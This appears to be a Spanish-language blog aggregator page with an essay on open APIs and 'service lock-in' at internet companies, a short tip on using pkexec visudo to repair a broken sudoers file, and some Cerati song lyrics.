Una empresa es una empresa. Una entidad que busca generar ganancias de una manera u otra. Cada una con su estrategia. A diferencia de estas viejas empresas representadas por monstruos como IBM, Microsoft, America OnLine entre otras, las “nuevas” empresas de Internet navegan con una bandera de paz y acercamiento no solo hacía usuarios sino hacia desarrolladores de software. Promoviendo no solo estos valores con acciones como permitir acceso a los medios siempre a sus oficinas llenas de mesas de ping pong y demás gadgets geeks sino incluso desarrollando software que después se libera como libre u open source. Esto parecería ser algo real y honesto, pero al final del día no lo es. Quienes dirigen estas empresas saben que la estrategia perfecta para acercar mano de obra gratuita y desarrollo de funcionalidad satélite al rededor de sus ecosistemas es simplemente parecerlo.

API’ s abiertas != servicios abiertos

La mayoría de las empresas centradas en Internet se esfuerzan no solo en utilizar tecnologías y protocolos abiertos (http, RESTful services, webservices, webM, etc.) sino en documentar claramente como utilizarlos, es decir, se nos invita abiertamente a hacer uso de sus API’s para desarrollar componentes o software que extiendan su plataforma, y ese es precisamente el asunto, se extiende, no se modifica.

El hecho de poder extender los servicios de estas empresas no nos hace parte de ellas. Pero lo que es más importante de entender: El servicio, que es lo que le da valor a una plataforma, sigue siendo controlado por la compañía. Lo ponía como ejemplo en un post anterior sobre google; el ecosistema android es libre en su mayoría, pero inútil sin los servicios de infraestructura propiedad de Google, que por cierto ni son abiertos ni son transparentes. Lo cual me hace recordar una frase de la película “The Matrix”:

What good is a phone call, if you are unable to speak?

 

Es como regalarnos herramienta y tubería y en general toda la infraestructura para montar una red de agua potable, loable si, honesto no. El objetivo final, una vez que hayamos construido nuestro sistema de irrigación será vendernos el agua. De la misma manera muchas empresas, como twitter, primero se encargan de montar una plataforma abierta donde el contenido no lo es, y que al final, es lo que le da valor a dicha plataforma. La estrategia es generar acercamiento a desarrolladores que extiendan, popularicen y depuren dicha plataforma, una vez que el servicio se ha vuelto popular entonces comienzan los bloqueos, las preferencias y los olvidos, los olvidos a esa comunidad de programadores y pequeños startups que permitieron que un servicio se volviera no solo famoso sino probablemente redituable.

Me deja pensando si en la actualidad, como arquitectos de software, desarrolladores y en general como programadores dependemos en un grado preocupante de muchas de estas tecnologías cloud que no controlamos y que en ese afán de comodidad en que se ha vuelto el “deja que alguien más lo haga” tenemos nuestros productos y proyectos basados en las decisiones de otros.

Cobra importancia entonces proyectos como Owncloud, Diaspora, FirefoxOS, identi.ca, jabber, entre otros aunque insisto, los componentes de software están ahí, lo que falta es quórum. Y aun habiendo quorúm existe otro riesgo; que aun con servicios y tecnologías descentralizadas podemos tener “vendor lock-in” como sucedía en años anteriores con el software, solo que esta vez sucede con los servicios. Google comenzó utilizando y apoyando ampliamente el servicio de XMPP o popularmente conocido como Jabber, sin embargo hace poco tiempo decidió descontinuar su uso a favor de sus propias tecnologías (no libres, claro) esto, por supuesto, una vez que se ayudaron a construir probablemente la comunidad mas grande de chat, después de facebook, con sus hangouts.

Una vez que una empresa en Internet cumple su misión, posiciona su producto y se vuelve redituable no debería de sorprendernos que nos den una patada en el trasero, pues ya no somos tan útiles. El “service lock-in” llegó para quedarse y reemplazar al viejo “software lock-in“. Batallamos años para deshacernos de este último y sin embargo no nos dimos cuenta mientras se fue creando otro; mismo juego, diferentes reglas.

Saludos.

Sábado 06 de septiembre de 2014

José Oviedo

José Oviedo
oviedo.mx

Sudo no funciona, error en el archivo sudoers

Al querer ingresar como root con el comando sudo me marca un error de que la sintaxis es incorrecta en el archivo sudoers, y probando con su root no deja entrar entonces, ¿como puedo tener acceso como root?

monitor@ubuntu:/home$ sudo su –
sudo: >>> /etc/sudoers: syntax error near line 22 < <<
sudo: parse error in /etc/sudoers near line 22
sudo: no valid sudoers sources found, quitting
sudo: unable to initialize policy plugin

monitor@ubuntu:/home$ su –
Password:
su: Authentication failure

1.- Tener acceso fisico y arrancar el GRUB y montar la partición como un solo usuario y despues poder modificar el archivo sudoers, en mi caso no tengo acceso fisico ni forma de ver el GRUB remotamente.

2.- Utilizar este truco, con este comando: pkexec visudo y poner la clave de root

monitor@ubuntu:~$ pkexec visudo
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `/usr/sbin/visudo’ as the super user
Authenticating as: ubuntu-prueba,,, (usuario)
Password:

Y vualaaaa!, aparece el archivo de configuración, buscamos la línea 22 y vemos la error de sintaxis, lo arreglamos y listo :)

Viernes 05 de septiembre de 2014

Gustavo Rubio

Gustavo Rubio
Ahí vamos

Un salto mortal

cerati

 

Sin querer, la vi llegar,
Su vibrante luz, encarnada en ilusión

Es la especie que nos une,
Un salto mortal, para que la vida continúe
En muchas sumas de placer

Y que dure lo que dure lo real

¿Es que acaso te sorprende el que sea así por siempre?

Hoy la tarde está increíble
Y quiero embellecerte más aun